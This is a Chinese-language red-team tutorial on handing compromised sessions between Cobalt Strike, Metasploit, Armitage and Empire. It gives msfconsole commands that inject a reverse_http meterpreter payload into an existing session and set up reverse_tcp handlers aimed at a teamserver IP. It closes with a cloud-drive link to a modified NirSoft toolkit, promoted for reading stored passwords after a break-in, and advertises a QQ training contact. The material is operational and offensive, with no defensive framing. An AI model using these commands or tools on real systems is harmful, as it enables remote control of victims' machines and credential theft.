0x000-前文
有技术交流或渗透测试培训需求的朋友欢迎联系QQ547006660
2000人网络安全交流群,欢迎大佬们来玩
群号820783253
0x001-Cobaltstrike与MSF会话互转
①Metasploit派生shell给Cobaltstrike
首先,你需要拿到一个metepreter会话,本例中session为1
Cobaltstrike的teamserver的ip为8.8.8.8,http监听器端口为4555
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 8.8.8.8.
msf exploit(payload_inject) > set LPORT 4555
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit
如图Cobaltstrike成功上线
②Cobalt strike 派生 shell 给 MSF(前提有个beacon shell)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 8.8.8.8
lhost => 8.8.8.8
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit
然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
,并根据metasploit监听配置cobaltstrike的listener
选择要派生的beacon,右键–>增加会话,选择刚刚配置的foreign监听器
MSF即可成功收到会话
0x002-Cobaltstrike与Armitage会话互转
Cobaltstrike派生shell给Armitage
首先在armitage中配置一个handler,注意:payload要与cobaltstrike的foreign监听器的协议相同,不然收不到会话。
同样使用刚刚讲过的cobaltstrike派生会话功能,armitage即可收到shell
Armitage派生shell给cobaltstrike
选择armitage中的会话,右键,Access–>Pss Session
随后配置相关信息为cobaltstrike http监听器的ip和端口
Cobaltstrike即可收到会话
0x003-Cobaltstrike与Empire会话互转
首先如图,在empire中配置好相关的http协议监听器
在cobaltstrike里面添加一个foreign监听器,协议为http
随后使用cobaltstrike中讲过的“增加会话”功能,选择该http监听器,empire即可成功收到会话。
0x004-小福利
今天分享的是神器nirsoft半汉化版,该程序在以管理员的身份运行时,可以读取机器中各种各样的密码,无疑是后渗透的神器之一。
链接:https://pan.baidu.com/s/1Ubh-HKf-FYdUAOxL7ooAGA
提取码:e8pz
